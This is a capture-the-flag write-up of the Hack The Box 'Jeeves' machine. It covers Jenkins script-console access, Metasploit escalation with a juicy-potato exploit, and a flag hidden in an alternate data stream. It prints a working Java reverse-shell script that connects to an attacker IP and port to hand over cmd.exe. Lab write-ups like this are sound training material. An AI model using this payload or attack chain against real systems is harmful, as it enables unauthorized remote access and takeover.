Try โ€‚โ€‰HackMD

HTB Series - Jeeves

tags: htb Jeeves windows walkthrough

We start by scanning the target with nmap to find open ports

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Navigating to the http ports, we can look at the directories under 50000 using dirb

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We navigate to /askjeeves

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We navigate to manage jenkins > script console

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We can use the script console to invoke a reverse shell

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We use this reverse shell





String host="10.10.14.3";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We setup a listener on port 8044, run the script and receive a shell

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We note privilege impersonation is enabled

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We can use msf to create a web delivery script and configure it with options as shown below

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We then run the exploit and execute the resulting script on the shell we have

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We run the exploit suggester to see possible ways to escalate

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We are aiming on some potato attack practice on this one hence the following approach:

We opt for exploit/windows/local/ms16_075_reflection_juicy and configure it as shown below

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Running the exploit gives us an elevated session

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We then get a privileged shell

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

I was aiming for token impersonation, but this particular exploit ended up not having a system token I could impersonate, though it did pop a shell as System so that wasn't required anymore.

We navigate to the users directory for the user flag

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We navigate to the Admin's directory for the root flag

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

The file says we should look deeper, so we can use the /R to look deeper.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

It appears to be hidden in an alternate data stream, to uncover that we can use techniques from this malware bytes post
Or we can use this workaround with more

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Last changed by 
โ€‰
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
154

Read more

Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Chatterbox - HTB Series

We start by scanning the target with nmap to find open ports

Aug 11, 2024
Active - HTB Series

image

Aug 10, 2024
Metasploit 101

MSF architecture Modules Exploit: contains the exploit code Payload: contains the shell code used after exploit compromises a system Encoder: allows us to modify the appearance of our exploit in order to avoid signature detection NOP: used with buffer overflow and ROP attacks. A NOP generator produces a series of random bytes that can be used to bypass standard IDS and IPS NOP sled signatures. Auxiliary: performs arbitrary actions not directly related to exploitation e.g Scanning, fuzzing, and DOS attacks. Usually used to scan and verify that machines are exploitable. Post: used for looting and pivoting.

Aug 8, 2024
Read more from codeAssassin
Published on HackMD